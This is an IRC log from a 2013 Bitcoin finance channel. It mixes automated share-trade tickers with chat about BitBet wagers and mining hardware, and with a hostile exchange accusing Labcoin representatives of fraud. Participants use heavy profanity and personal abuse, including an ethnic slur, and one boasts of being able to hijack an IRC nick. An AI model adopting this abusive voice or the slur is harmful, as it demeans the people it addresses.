Sep 30 17:21:09 well, make me an offer Sep 30 17:22:00 [BTCTC] [LABCOIN] 21357 @ 0.0002017 = 4.3077 BTC [-] {4} Sep 30 17:23:01 [BTCTC] [LABCOIN] 5989 @ 0.0002076 = 1.2433 BTC [+] {2} Sep 30 17:29:48 1 trillion USD per 0.1% Sep 30 17:31:09 [HAVELOCK] [VTX] 1 @ 0.49121 BTC [-] Sep 30 17:34:12 [BTCTC] [LABCOIN] 500 @ 0.0002076 = 0.1038 BTC [+] Sep 30 17:35:27 sorry, i don't hold usd ;( Sep 30 17:39:27 mircea_popescu: just emailed you my pubkey for reverification Sep 30 17:41:19 [BTCTC] [LABCOIN] 4588 @ 0.0002255 = 1.0346 BTC [-] {2} Sep 30 17:46:24 [BTCTC] [ACTIVEMINING] 310 @ 0.001401 = 0.4343 BTC [-] Sep 30 17:50:29 [BTCTC] [LABCOIN] 100000 @ 0.00020092 = 20.092 BTC [-] {21} Sep 30 17:54:33 [BTCTC] [LABCOIN] 3000 @ 0.000185 = 0.555 BTC [-] Sep 30 18:03:29 gotta go cut keys and fix a dryer Sep 30 18:06:45 [HAVELOCK] [B] [XBOND] 137 @ 0.00117 = 0.1603 BTC [+] {2} Sep 30 18:09:20 ;;bc;stats Sep 30 18:09:21 Error: "bc;stats" is not a valid command. Sep 30 18:09:23 ;;bc,stats Sep 30 18:09:26 Current Blocks: 260921 | Current Difficulty: 1.4881919980509263E8 | Next Difficulty At Block: 262079 | Next Difficulty In: 1158 blocks | Next Difficulty In About: 1 week, 0 days, 3 hours, 33 minutes, and 20 seconds | Next Difficulty Estimate: 175967017.122 | Estimated Percent Change: 18.24215 Sep 30 18:25:02 [BTCTC] [S.MPOE-PT] 2457 @ 0.0006987 = 1.7167 BTC [+] {2} Sep 30 18:25:17 <_Neil> mircea_popescu: How much is a "significant paid wager" on your site? Sep 30 18:26:36 want the long answer? Sep 30 18:26:48 <_Neil> Sure Sep 30 18:27:50 BitBet supplies no less than 0.1 BTC as seed wagers on any new bet accepted. BitBet also charges 1% on all bets made. Sep 30 18:27:50 Because of this if an otherwise acceptable bet (such as to text, topic etc) is judged by the moderator as statistically unlikely to generate Sep 30 18:27:56 enough BTC through the fee to cover the initial outlay, the bet will be rejected with that message. As such a 10BTC original wager is an absolute Sep 30 18:27:57 guarantee. Anything under that will bring to issue the quoestion of "how likely is likely". Sep 30 18:28:58 <_Neil> OK; seeing as some of your highest taking bets have been around difficulty I don't understand your rejection of a well-judged one. Sep 30 18:30:01 Pending "Scrypt ASIC will exist in 2013", haha, I like this one. have we even seen a fpga? Sep 30 18:31:03 _Neil wait for mp then Sep 30 18:37:19 not yet pankkake Sep 30 18:39:10 as far as I understand, they would be much more expensive than a sha256 asic, because of the memory requirements Sep 30 18:39:31 asicminer basically said it wasn't worth it Sep 30 18:39:54 unless scrypt coins gain value, which doesn't seem to be the case Sep 30 18:41:18 [HAVELOCK] [AM100] 48 @ 0.01304228 = 0.626 BTC [-] {6} Sep 30 18:43:45 yep, thats my understanding too Sep 30 18:47:24 [BTCTC] [LABCOIN] 3103 @ 0.00018632 = 0.5782 BTC [-] {2} Sep 30 18:57:54 https://www.kncminer.com/userfiles/image/ASICinPCB.jpg Sep 30 19:03:40 [HAVELOCK] [VTX] 7 @ 0.49098857 = 3.4369 BTC [-] {4} Sep 30 19:06:43 [BTCTC] [PETA-MINE] 5 @ 0.62938 = 3.1469 BTC [+] {3} Sep 30 19:08:47 pan, FPGAs exist for scrypt Sep 30 19:19:56 [BTCTC] [LABCOIN] 3080 @ 0.000209 = 0.6437 BTC [-] Sep 30 19:22:59 [BTCTC] [DMS.MINING] 193 @ 0.00120205 = 0.232 BTC [-] {2} Sep 30 19:22:59 [BTCTC] [LABCOIN] 600 @ 0.000209 = 0.1254 BTC [-] Sep 30 19:24:00 [BTCTC] [LABCOIN] 940 @ 0.000209 = 0.1965 BTC [-] Sep 30 19:30:05 [HAVELOCK] [B] [XBOND] 900 @ 0.00119984 = 1.0799 BTC [+] {3} Sep 30 19:33:08 [BTCTC] [LABCOIN] 3080 @ 0.000209 = 0.6437 BTC [-] Sep 30 19:37:12 [BTCTC] [RSM] 25 @ 0.0041 = 0.1025 BTC [+] Sep 30 19:44:19 [BTCTC] [LABCOIN] 5080 @ 0.0002135 = 1.0846 BTC [+] {2} Sep 30 19:48:23 [BTCTC] [BASIC-MINING] 10 @ 0.0477 = 0.477 BTC [+] Sep 30 19:48:24 [BTCTC] [ASICMINER-PT] 11 @ 1.3030909 = 14.334 BTC [-] {5} Sep 30 19:49:24 [BTCTC] [ASICMINER-PT] 5 @ 1.28519999 = 6.426 BTC [-] {3} Sep 30 19:54:29 [BTCTC] [ASICMINER-PT] 1 @ 1.28 BTC [-] Sep 30 20:16:52 [BTCTC] [LABCOIN] 1090 @ 0.00021 = 0.2289 BTC [-] Sep 30 20:19:55 [BTCTC] [LABCOIN] 1233 @ 0.00021 = 0.2589 BTC [-] Sep 30 20:20:56 [BTCTC] [LABCOIN] 8700 @ 0.00021786 = 1.8954 BTC [+] {2} Sep 30 20:30:05 [BTCTC] [LABCOIN] 5002 @ 0.00022307 = 1.1158 BTC [+] {4} Sep 30 20:43:18 [BTCTC] [ASICMINER-PT] 1 @ 1.27 BTC [-] Sep 30 21:10:44 [HAVELOCK] [AM1] 10 @ 1.305 = 13.05 BTC [+] {2} Sep 30 21:11:45 [HAVELOCK] [AM100] 17 @ 0.01300823 = 0.2211 BTC [-] {2} Sep 30 21:17:51 [MPEX] [S.MPOE] 4499 @ 0.00084586 = 3.8055 BTC [+] {3} Sep 30 21:27:38 _Neil hm ? Sep 30 21:27:50 pankkake well memory isn't really THAT expensive. Sep 30 21:29:17 you still would have asic with memory controller + memory, in competition with gpu, on price Sep 30 21:29:42 so say double. Sep 30 21:29:44 not ^2 Sep 30 21:30:03 [BTCTC] [ASICMINER-PT] 1 @ 1.26 BTC [-] Sep 30 21:30:50 so in the end knc has delivered... more pix Sep 30 21:32:02 yeah, more pics! Sep 30 21:36:45 better than labcoin! Sep 30 21:46:39 yes, that is very true Sep 30 21:47:22 so no local pickup of units? Sep 30 21:48:07 anything built in Sweden is wierd as shit Sep 30 21:48:24 weired Sep 30 21:49:22 [BTCTC] [LABCOIN] 18430 @ 0.00026003 = 4.7924 BTC [+] {5} Sep 30 21:49:31 we already know bitbet is corrupt Sep 30 21:49:37 knc delivered? Sep 30 21:50:03 saab, volvo, ikea and lutekfisk Sep 30 21:51:24 [BTCTC] [LABCOIN] 3900 @ 0.00027 = 1.053 BTC [+] {2} Sep 30 21:52:25 [BTCTC] [LABCOIN] 9335 @ 0.00027 = 2.5205 BTC [+] {2} Sep 30 21:53:26 [BTCTC] [LABCOIN] 26388 @ 0.00029104 = 7.68 BTC [+] {12} Sep 30 21:53:26 [BTCTC] [PETA-MINE] 2 @ 0.62975 = 1.2595 BTC [+] {2} Sep 30 21:53:31 MtGox BTCUSD ticker | Best bid: 140.48213, Best ask: 141.30489, Bid-ask spread: 0.82276, Last trade: 140.48213, 24 hour volume: 12482.82007968, 24 hour low: 138.12000, 24 hour high: 145.81000, 24 hour vwap: 142.39619 Sep 30 21:53:51 49168 Sep 30 21:54:27 [BTCTC] [LABCOIN] 6200 @ 0.00030322 = 1.88 BTC [+] {9} Sep 30 21:55:28 [BTCTC] [LABCOIN] 1372 @ 0.000309 = 0.4239 BTC [+] {2} Sep 30 21:56:29 [BTCTC] [LABCOIN] 12947 @ 0.00030978 = 4.0107 BTC [+] {3} Sep 30 21:57:30 [BTCTC] [ASICMINER-PT] 2 @ 1.267 = 2.534 BTC [+] {2} Sep 30 21:57:30 [BTCTC] [LABCOIN] 10000 @ 0.00032246 = 3.2246 BTC [+] {6} Sep 30 21:58:32 [BTCTC] [LABCOIN] 14157 @ 0.00034039 = 4.8189 BTC [+] {2} Sep 30 21:59:32 [BTCTC] [LABCOIN] 24875 @ 0.00036351 = 9.0423 BTC [+] {13} Sep 30 21:59:54 ridiculous Sep 30 22:01:17 42144 Sep 30 22:01:23 I dont' think it is really anyone except a troll Sep 30 22:01:34 [BTCTC] [LABCOIN] 1721 @ 0.000381 = 0.6557 BTC [+] Sep 30 22:01:45 pankkake is that you?? Sep 30 22:01:48 lol Sep 30 22:03:46 no Sep 30 22:03:51 but the guy has said nothing Sep 30 22:03:55 they buy Sep 30 22:03:56 :| Sep 30 22:04:02 well, he quit without answering any ? Sep 30 22:04:25 that was a good q&a session Sep 30 22:04:37 [BTCTC] [LABCOIN] 26165 @ 0.00030299 = 7.9277 BTC [-] {8} Sep 30 22:04:42 it's labcoin, he said it in the forum - but still, buying because the guy *shows up*? Sep 30 22:04:47 that's serious despair Sep 30 22:05:38 [BTCTC] [LABCOIN] 6500 @ 0.00026847 = 1.7451 BTC [-] {3} Sep 30 22:05:47 buying is over Sep 30 22:05:57 lol Sep 30 22:06:10 oh wait hes back Sep 30 22:06:39 [BTCTC] [LABCOIN] 1555 @ 0.00026 = 0.4043 BTC [-] Sep 30 22:07:40 [BTCTC] [LABCOIN] 4000 @ 0.00034 = 1.36 BTC [+] {2} Sep 30 22:08:41 [BTCTC] [LABCOIN] 3075 @ 0.00031357 = 0.9642 BTC [-] {3} Sep 30 22:08:44 who is where? Sep 30 22:09:12 labcoin__ at #labcoin Sep 30 22:09:22 answering questions right now Sep 30 22:09:31 saulimus how do you know ? Sep 30 22:09:52 he posted in the forums his nick when he joined the chan Sep 30 22:10:20 https://bitcointalk.org/index.php?topic=263445.msg3271100#msg3271100 Sep 30 22:10:22 [LABCOIN] IPO [BTCT.CO] - Details/FAQ and Discussion (ASIC dev/sales/mining) Sep 30 22:10:36 he virified it was him with a challenge code from bitcointalk :/ Sep 30 22:10:43 [BTCTC] [LABCOIN] 6296 @ 0.00037722 = 2.375 BTC [+] {5} Sep 30 22:10:49 i guess i'm out of place to think of ;;ident and other such advanced technicue. Sep 30 22:11:11 yes, that is way too technical Sep 30 22:11:17 sometimes advanced bots aren't needed ;) Sep 30 22:11:27 design a chip = yes auth with gribble= no Sep 30 22:11:44 saulimus you know i can trivially netsplit him and take his unnickserved nick right ? Sep 30 22:12:05 then don't do it? Sep 30 22:12:23 :) Sep 30 22:12:29 not really the point but okay. Sep 30 22:12:45 [BTCTC] [LABCOIN] 43460 @ 0.00039575 = 17.1993 BTC [+] {13} Sep 30 22:12:48 actually Sep 30 22:15:22 -NickServ- Information on labcoin (account labcoin): Sep 30 22:15:22 -NickServ- Registered : Sep 29 06:54:44 2013 (1 day, 12:20:23 ago) Sep 30 22:15:45 hi is using labcoin__ currently Sep 30 22:15:46 better than nothing. Sep 30 22:15:48 he Sep 30 22:15:48 [BTCTC] [LABCOIN] 5000 @ 0.00035 = 1.75 BTC [-] Sep 30 22:15:54 jborkl that's just a little lulzy. Sep 30 22:15:59 if that is a grouped nick Sep 30 22:16:16 let's have a little fun. Sep 30 22:16:39 mass chaos for sure Sep 30 22:17:07 * Topic for #labcoin set by Rulother!~Rulother@72.16.217.169 at Fri Sep 27 00:56:41 2013 Sep 30 22:17:11 lolz Sep 30 22:17:31 No need to be a dick Sep 30 22:18:12 no, actually, there's an imperative need to be a dick. Sep 30 22:18:17 it's +m sadly Sep 30 22:18:25 lack of sufficient dick down appropriate throats is what's the problem here. Sep 30 22:18:30 waow Sep 30 22:18:47 it's always the problem Sep 30 22:18:53 Good morning all, I will be assisting Sam Sep 30 22:19:00 lol dork will "consider option" Sep 30 22:19:04 do you have a big wang? Sep 30 22:19:05 anyway, enough of this nonsense. Sep 30 22:19:18 I am with Sam this moment Sep 30 22:19:31 proof? Sep 30 22:19:52 [HAVELOCK] [HIM] 1 @ 0.1401 BTC [-] Sep 30 22:19:53 [BTCTC] [LABCOIN] 30221 @ 0.00032124 = 9.7082 BTC [-] {8} Sep 30 22:19:58 you can check my IP Sep 30 22:20:03 "I have read the material and fully understand it -- this isn't my first Sep 30 22:20:03 dance, you know. Sep 30 22:20:03 It's a fraud from the top down and I have no time for frauds or those Sep 30 22:20:03 who promote them." Sep 30 22:20:15 old people fully understanding bitcoin. Sep 30 22:20:17 it's a sight. Sep 30 22:20:46 same isp isn't exactly proof Sep 30 22:20:53 [BTCTC] [LABCOIN] 1318 @ 0.0002901 = 0.3824 BTC [-] Sep 30 22:21:04 well, it's same building as you can see Sep 30 22:21:29 We will see if we can post some more informations such as pictures at a later stage Sep 30 22:21:34 labcoin isp isn't in hong kong, but thailand Sep 30 22:21:59 thailand? Sep 30 22:22:02 OMG LABCOIN Sep 30 22:22:02 how no taiwan Sep 30 22:22:07 slipage Sep 30 22:22:09 haha Sep 30 22:22:14 suddenly had a vision :p Sep 30 22:22:22 that is a sad q&a Sep 30 22:22:25 zhenhua_wang suppose you take the scamtalk to the dedicated scam chan Sep 30 22:22:32 this here is for bitcoin finance. Sep 30 22:23:11 mircea_popescu: sorry, is this not considered finance Sep 30 22:23:15 and for that matter, "same building" : http://www.stopforumspam.com/ipcheck/111.242.80.220 Sep 30 22:23:19 it's a shitty relay. get lost. Sep 30 22:23:21 so they say they have (more or less) 7th of usable chips- that have been sent off to a top secret lab Sep 30 22:23:33 you were spamming off that same ip exactly today. Sep 30 22:24:04 i mean, it's one thing to be a scammy fuck. it's another to be as fucking stupid as you people. Sep 30 22:24:04 mircea_popescu: can you re-add my pub key? i emailed it a few hours ago Sep 30 22:24:20 topace yeah im doing one batch each day. be a few hrs. Sep 30 22:24:25 ahh ok Sep 30 22:24:27 no worries Sep 30 22:24:27 thanks Sep 30 22:24:34 excuse me, we are here because we have been asked to post more stuffs by the community and clear up this situation Sep 30 22:24:57 [BTCTC] [LABCOIN] 5404 @ 0.0002901 = 1.5677 BTC [-] {2} Sep 30 22:25:20 to avoid us being labelled as a 'scam' or others we are here to show that we do indeed have a mining operation underway Sep 30 22:25:58 [HAVELOCK] [B] [XBOND] 500 @ 0.001177 = 0.5885 BTC [-] {4} Sep 30 22:26:08 I have a reel of chips sitting on my desk that are mining more than labcoin Sep 30 22:26:13 no, you are here because you Sep 30 22:26:20 're too fucking stupid to realise how stupid you are to be here. Sep 30 22:26:38 now go make some pics of your famished ass with a shoe on head. Sep 30 22:26:59 [BTCTC] [LABCOIN] 101495 @ 0.00020047 = 20.3467 BTC [-] {20} Sep 30 22:27:12 once again we advise all investors to buy shares while they are cheap, We are confident in fact that the price will raise tenfold in respect to IPO Sep 30 22:27:22 zhenhua_wang shut the fuck up scammer. Sep 30 22:27:39 lol Sep 30 22:27:55 please join #labcoin for main storyline as to see Sep 30 22:28:00 the gall of this fuckwit. saunters in here with a known spammer ip and advises "investors". Sep 30 22:28:03 zhenhua_wang scrypt ASIC IPO coming at you hard Sep 30 22:28:06 go back to your hole. Sep 30 22:28:39 jcpham: sorry, but for several reasons a scrypt device will not be applicable, it depends right now on too many 'unknow' variables Sep 30 22:28:44 Diablo-D3 in development for months yo Sep 30 22:28:49 buy while you still can! Sep 30 22:29:04 that is the worst q&a I could imagine, pictures - no cant get them - proof, not available any more questions? Sep 30 22:29:08 it has terrabytes of RAMs Sep 30 22:29:11 all over it Sep 30 22:29:20 and stuff Sep 30 22:29:21 right now we have served that cost of DDR is to prohibitive Sep 30 22:29:25 just preorder it and shut up. Sep 30 22:29:59 so what are ya'll trolling about Sep 30 22:30:01 [HAVELOCK] [HIM] 28 @ 0.13524392 = 3.7868 BTC [-] {8} Sep 30 22:30:04 isee text scrolling buy Sep 30 22:30:05 Stegosaurus scrypt miner Sep 30 22:30:15 but its just a bunch of loud noises Sep 30 22:30:32 jcpham http://funfive.net/images/Nigerian%20419%20scam.jpg Sep 30 22:30:50 labcoin still a scam? Sep 30 22:30:52 it's an open proxy http://proxylist.org.ua/?v=111.242.80.220 Sep 30 22:30:59 or did they promise a statement Sep 30 22:31:01 pankkake yeah. Sep 30 22:31:16 now they say they got bought out Sep 30 22:31:20 weird that those still exist in 2013 Sep 30 22:31:25 and this is the new owner Sep 30 22:31:30 it's an open proxy that's "in the same building" as the multi-faceted mr whatshisnametoday. Sep 30 22:32:11 link me to any new labcoin popcorn please Sep 30 22:32:16 How much money is left - I don't know Sep 30 22:32:22 mircea_popescu: You are completely out of mind and full of bullshit.. Sep 30 22:32:30 use pronouns. Sep 30 22:32:34 it's english not gookspeak. Sep 30 22:33:07 zhenhua_wang, all you have to do is tell labcoin__ to say that you're with him. if you can't do that... Sep 30 22:33:37 saulimus i'd much prefer an explanation as to why exactly did he just lie above about his ip showing his location as "in the same building". Sep 30 22:33:53 I don't like reading fairy tales Sep 30 22:33:59 just get to the point Sep 30 22:33:59 it takes a certain level of dumb to give yourself the lie like that, out of your own free will. Sep 30 22:34:00 mircea_popescu: you are simple minded. sorry but your are a psychopathic Sep 30 22:34:05 helloo Sep 30 22:34:18 soon bitbet of KNC delivery ends... Sep 30 22:34:19 What's gookspeak? Sep 30 22:34:22 lmao. the simpleminded psychopath. Sep 30 22:34:25 i should write this novel. Sep 30 22:34:49 Anduck: will you bribe bitbet this time too? Sep 30 22:35:01 was he the guy that bribed bitbet ? Sep 30 22:35:01 i would pay monies to see labcoin fall apart on the big screen Sep 30 22:35:02 pankkake: yes Sep 30 22:35:05 There's no gap in my thought process. you're pathetic attempts to 'trip up' us will not work Sep 30 22:35:29 herp. scamboy, the topic has moved away. try to keep up. Sep 30 22:35:33 but anyway Sep 30 22:35:42 so is labcoin still a scam or not Sep 30 22:35:43 Anduck how much you payin' this time ? Sep 30 22:35:45 is there any way that the knc bet could end up YES anymore? Sep 30 22:35:48 mircea_popescu: depends... Sep 30 22:35:58 well it's not 1st yet is it ? Sep 30 22:36:02 well it is Sep 30 22:36:13 in russia... china.. australia... Sep 30 22:36:13 our investors will the truth after we haved deliver our first steps, so please stop this non sense 'scam' accusation Sep 30 22:36:24 in gmt. Sep 30 22:36:25 mircea_popescu: which timezone is used? Sep 30 22:36:27 ok Sep 30 22:36:30 hey why am i not getting any of this bribery stuffs Sep 30 22:36:35 please refer to #labcoin on freenode to see answer from management Sep 30 22:36:38 that seems to be like the one favourite q. what timezone is bbet in. Sep 30 22:36:42 is it stated at bitbet site that the timezone used is GMT? Sep 30 22:36:46 kakobrekla because you're too principled. Sep 30 22:36:59 :( Sep 30 22:37:02 Anduck http://bitbet.us/faq/#170 Sep 30 22:37:06 aighto Sep 30 22:37:17 kakobrekla sucks huh. Sep 30 22:37:19 wel Sep 30 22:37:25 would pickup be tolerated? Sep 30 22:37:38 if 5 guys pickup their unit and show it and do proofs in time? Sep 30 22:38:04 jesus god. we're going to end up with a dispute as to what "delivered" means, to go with the one about what "unit" means Sep 30 22:38:09 [BTCTC] [LABCOIN] 500 @ 0.0002101 = 0.1051 BTC [+] Sep 30 22:38:15 im starting to hope they burn down or something so it's clear cut. Sep 30 22:38:51 =) Sep 30 22:39:10 [MPEX] [S.MPOE] 5946 @ 0.00084939 = 5.0505 BTC [+] {2} Sep 30 22:39:11 mircea_popescu: btw, punin stated that some august units did include 2 m-boards and extra h-boards Sep 30 22:39:28 fractal then quoted it at forums - so did i... Sep 30 22:39:34 you know the guy btw ? Sep 30 22:39:59 then the original msg was edited and fractal went and blamed me for faking quote... though he had quoted the original text, too xD Sep 30 22:40:00 delivered seems pretty clear to me, if it's pickup it's the date it was picked up, and if it's shipped then it's the date shipped - because everything else doesn't depend on knc's ability Sep 30 22:40:03 nope i don't know Sep 30 22:41:35 so i guess we'll never know why the labcoin scammer was using that particular ip huh. Sep 30 22:41:52 walks like a duck... Sep 30 22:42:03 does it quack, too? Sep 30 22:42:05 it's not a labcoin guy, is it? just a troll Sep 30 22:42:10 (the one here) Sep 30 22:42:13 [BTCTC] [LABCOIN] 3951 @ 0.00021507 = 0.8497 BTC [+] {2} Sep 30 22:42:27 i often find that scammers utilize misdirection Sep 30 22:42:44 pankkake no, i think it was the genuine article. Sep 30 22:42:54 Don't get scammed, invest in rentalstarter Sep 30 22:43:09 mental age about 12, where you think finding an open relay in taiwan is "proof", because it's in taiwan. Sep 30 22:43:19 i think i upset him talking about the scrypt ipo Sep 30 22:44:46 hey guise, Sep 30 22:44:54 you don't really think im simple minded psychotic do you ? Sep 30 22:45:48 you're not simple minded Sep 30 22:45:49 you are not simple minded Sep 30 22:45:53 hehehe Sep 30 22:47:16 lol Sep 30 22:47:47 bashd. Sep 30 22:49:43 I wish my question (betting on their next anouncment) goes in Sep 30 22:50:07 i wonder if he really meant psychopathic, but his old copy of Carmelite English Vocabulary wasn't too clear on the difference. Sep 30 22:51:48 he said "a psychopathic" Sep 30 22:52:23 [BTCTC] [LABCOIN] 1191 @ 0.0002202 = 0.2623 BTC [-] Sep 30 22:52:39 i guess MY copy of the cev wasn't too clear lol Sep 30 22:55:26 [HAVELOCK] [HIM] 215 @ 0.12327072 = 26.5032 BTC [-] {12} Sep 30 22:55:28 [BTCTC] [LABCOIN] 2700 @ 0.0002202 = 0.5945 BTC [-] Sep 30 22:56:27 [BTCTC] [LABCOIN] 15000 @ 0.00021708 = 3.2562 BTC [-] {5} Sep 30 22:56:28 [HAVELOCK] [HIM] 11 @ 0.10000909 = 1.1001 BTC [-] {2} Sep 30 22:56:29 [BTCTC] [ASICMINER-PT] 3 @ 1.268 = 3.804 BTC [+] {3} Sep 30 22:57:28 [BTCTC] [LABCOIN] 40000 @ 0.00019469 = 7.7876 BTC [-] {8} Sep 30 22:59:30 [BTCTC] [LABCOIN] 557 @ 0.0001901 = 0.1059 BTC [-] Sep 30 22:59:31 [BTCTC] [ASICMINER-PT] 3 @ 1.25133333 = 3.754 BTC [-] {2} Sep 30 23:03:35 [BTCTC] [ASICMINER-PT] 5 @ 1.2502 = 6.251 BTC [-] {2} Sep 30 23:06:38 [HAVELOCK] [AM100] 29 @ 0.01348999 = 0.3912 BTC [+] Sep 30 23:07:40 [HAVELOCK] [B] [XBOND] 210 @ 0.00115013 = 0.2415 BTC [-] {4} Sep 30 23:08:40 [HAVELOCK] [B] [XBOND] 736 @ 0.00111165 = 0.8182 BTC [-] {11} Sep 30 23:08:41 [BTCTC] [LABCOIN] 2500 @ 0.0002712 = 0.678 BTC [+] {2} Sep 30 23:09:41 [BTCTC] [ASICMINER-PT] 4 @ 1.25 = 5 BTC [-] Sep 30 23:09:41 [BTCTC] [LABCOIN] 10200 @ 0.00029879 = 3.0477 BTC [+] {3} Sep 30 23:10:42 [BTCTC] [LABCOIN] 4541 @ 0.0002988 = 1.3569 BTC [+] {2} Sep 30 23:10:42 [HAVELOCK] [HIM] 3 @ 0.1 = 0.3 BTC [-] Sep 30 23:11:27 lot of bag holding going on Sep 30 23:11:38 40,000 @.00019 Sep 30 23:11:43 [BTCTC] [LABCOIN] 4500 @ 0.0002989 = 1.3451 BTC [+] Sep 30 23:12:26 lewicki if that person learns something it's a well spent grand. Sep 30 23:12:48 60btc loss is more than a grand Sep 30 23:12:56 o right you are. Sep 30 23:13:45 [BTCTC] [ASICMINER-PT] 1 @ 1.219 BTC [-] Sep 30 23:13:52 these answers in #labcoin are total bullshit Sep 30 23:13:57 travelling? Sep 30 23:14:08 lol Sep 30 23:14:20 Yeah. To Barbadose to retire. Sep 30 23:14:28 or visit all the brothels in the world Sep 30 23:14:46 ANd bathe in coke. Sep 30 23:14:57 cocaine, that is. Sep 30 23:15:00 not the fizzy drink Sep 30 23:15:20 pankkake don't be simpleminded! Sep 30 23:15:26 I wonder what I'll do with millions Sep 30 23:15:52 probably buy a bunker and a tank Sep 30 23:16:03 (because i'm a sociopath but not simple minded) Sep 30 23:16:04 that could be fun Sep 30 23:17:12 you'll prolly buy a beach house and a trophy wife Sep 30 23:17:18 then end up brokeand divorced Sep 30 23:17:40 not my style. I hate beaches, and mariage is a scam Sep 30 23:17:49 [BTCTC] [PETA-MINE] 1 @ 0.6547 BTC [+] Sep 30 23:17:53 I'll hire a sexy maid, maybe Sep 30 23:18:08 fun fact : bathing in coke gets girls high but not boys. Sep 30 23:18:13 little phenomena known as shelving. Sep 30 23:18:21 why? Sep 30 23:18:50 [BTCTC] [LABCOIN] 5307 @ 0.0002989 = 1.5863 BTC [+] Sep 30 23:24:06 meh bullshit deflection Sep 30 23:24:13 how much time do you spend on labcoin? i spend enough time Sep 30 23:24:50 i saw those sells up there Sep 30 23:24:57 you are psychotic please don't simplemind. Sep 30 23:25:00 what did it labcoin ipo at Sep 30 23:25:06 jcpham roughly 10x that. Sep 30 23:25:20 then it got around .004 or something Sep 30 23:25:21 the guy has another job Sep 30 23:25:39 raise 7500 BTC, don't quit your job? Sep 30 23:25:57 [HAVELOCK] [HIM] 5 @ 0.10998 = 0.5499 BTC [+] {3} Sep 30 23:25:58 [BTCTC] [LABCOIN] 5000 @ 0.00032389 = 1.6195 BTC [+] {2} Sep 30 23:25:59 nah it's bullshit, if i was trying to scam, these are the types of responses i would give to questions asked Sep 30 23:26:02 hehe funny Sep 30 23:26:04 labcoin__ Sep 30 23:26:04 10:18 Sep 30 23:26:04 Yes it is, i am located in switzerland right now Sep 30 23:26:15 so the shares have dropped a full decimal place since IPO? Sep 30 23:26:18 wasn't that other guy saying he was with sam in taiwan? Sep 30 23:26:19 pankkake he's lucky if he actually has a job and he definitely shouldn't quit it. Sep 30 23:26:36 tyrion70 yeah, on some proxy ip. Sep 30 23:26:47 oh, sure. but… that shows how much of a joke the whole thing is Sep 30 23:26:57 topace Sep 30 23:26:58 [BTCTC] [LABCOIN] 1000 @ 0.00033 = 0.33 BTC [+] Sep 30 23:27:04 yessir? Sep 30 23:27:10 mircea_popescu funny :P at least we had a good laugh today Sep 30 23:27:10 your key. Sep 30 23:27:24 tyrion70 bitcoin. backed by lulz and drama. since 2011. Sep 30 23:27:35 ;) Sep 30 23:27:36 merci Sep 30 23:28:21 this #labcoin chat is classic stringing people along Sep 30 23:29:21 i hope someone's logging that chan. Sep 30 23:29:39 like San1ty since its his Sep 30 23:29:44 oh shit I didn't know ther TheSeven was involved in labcoin Sep 30 23:29:50 there's a public log already Sep 30 23:29:54 and a bot Sep 30 23:29:57 they're very organized Sep 30 23:30:03 all that good work for… nothing Sep 30 23:30:28 myeah. Sep 30 23:31:02 [HAVELOCK] [HIM] 5 @ 0.1032 = 0.516 BTC [+] {2} Sep 30 23:34:53 http://irc.radiumsoup.com/freenode/labcoin/logs/ Sep 30 23:34:55 IRC log of labcoin @ irc.freenode.net Sep 30 23:36:07 [BTCTC] [LABCOIN] 6550 @ 0.00030721 = 2.0122 BTC [-] {2} Sep 30 23:36:07 [BTCTC] [B] [CIPHERMINE.B1] 118 @ 0.0085 = 1.003 BTC [-] {2} Sep 30 23:37:07 [HAVELOCK] [HIM] 5 @ 0.13916 = 0.6958 BTC [+] {5} Sep 30 23:37:19 except he won't be returning from this trip Sep 30 23:39:09 [BTCTC] [LABCOIN] 13000 @ 0.00032981 = 4.2875 BTC [+] {5} Sep 30 23:41:11 [BTCTC] [LABCOIN] 31987 @ 0.00035444 = 11.3375 BTC [+] {11} Sep 30 23:41:11 [HAVELOCK] [HIM] 1 @ 0.125 BTC [-] Sep 30 23:43:58 hmm… he could state his flight, miss it, arrange the plane to explode Sep 30 23:44:07 perfect getaway! Sep 30 23:44:14 or he could just continue being stupid on the internet. Sep 30 23:44:36 guessing he'll soon say sorry, gotta go, bye Sep 30 23:44:36 with the use of only the occam razor, please specify which path will be chosen. Sep 30 23:44:41 I am stupid on the internet, but I don't have 7500 BTC Sep 30 23:45:31 more bs, what they're doing instead of why they left Sep 30 23:45:44 <@radiumsoup> Are you Swiss or Chinese? Sep 30 23:45:48 do you like pizza? Sep 30 23:46:22 <+labcoin__> i am Italian <= I guess that's a yes Sep 30 23:46:44 he'll cut his wrists with occam razor Sep 30 23:47:40 i wonder if anyone'll eventually prove a link to the alberto amandi/owens/rosenfeld merry troupe of fraudsters. Sep 30 23:51:21 [HAVELOCK] [HIM] 3 @ 0.11999999 = 0.36 BTC [-] Sep 30 23:52:22 [BTCTC] [LABCOIN] 5307 @ 0.00035939 = 1.9073 BTC [+] {4} Sep 30 23:53:23 [BTCTC] [LABCOIN] 5000 @ 0.00031 = 1.55 BTC [-] {3} Sep 30 23:54:24 [BTCTC] [LABCOIN] 8308 @ 0.0003003 = 2.4949 BTC [-] Oct 01 00:01:31 [HAVELOCK] [HIM] 3 @ 0.11499999 = 0.345 BTC [-] Oct 01 00:04:35 jcpham: well, defined "involved"... I'm a freelance contractor doing a bit of technical consulting for them Oct 01 00:04:55 sorry man, not to implicate you... Oct 01 00:05:03 it's not like they'd let me fix their problems though :P Oct 01 00:05:14 i'm a part-time internet stalker and your rockbox and other involvement makes me trust you a bit Oct 01 00:05:15 (which I'd happily attempt to do if they would let me) Oct 01 00:05:35 [BTCTC] [LABCOIN] 5003 @ 0.00025233 = 1.2624 BTC [-] {3} Oct 01 00:05:46 right now they just fail to give me any relevant information on what kind of trouble they even have on the technical side Oct 01 00:06:07 the guy said he will send you a board Oct 01 00:06:10 "communication issues" is about the most detailed answer I was able to squeeze out of them Oct 01 00:06:12 which guy said that? Oct 01 00:06:14 TheSeven so basically you're involved in the sense that they want to abuse your name. Oct 01 00:06:16 i understand they are keeping you in the dark. thank you. Oct 01 00:06:22 mircea_popescu: kinda, ye Oct 01 00:06:23 yes* Oct 01 00:06:31 labcoin guy. as a trusted member to confirm they actually have some chips working Oct 01 00:06:31 gotta be on guard for that sort of shit. Oct 01 00:06:47 pankkake: which particular labcoin guy did say that, and where? Oct 01 00:06:53 because nobody informed me of that Oct 01 00:06:58 there's only one, but anyway. was on forum. Oct 01 00:07:05 "Samuele Noi". on #labcoin, just a few minutes ago Oct 01 00:07:06 kinda funny to not tell the recipient that you're gonna send him a board... Oct 01 00:07:08 i would think if they had working chips you'd know about it Oct 01 00:07:19 jcpham "communication issues". Oct 01 00:07:22 wow, someone from them really turned up on IRC? Oct 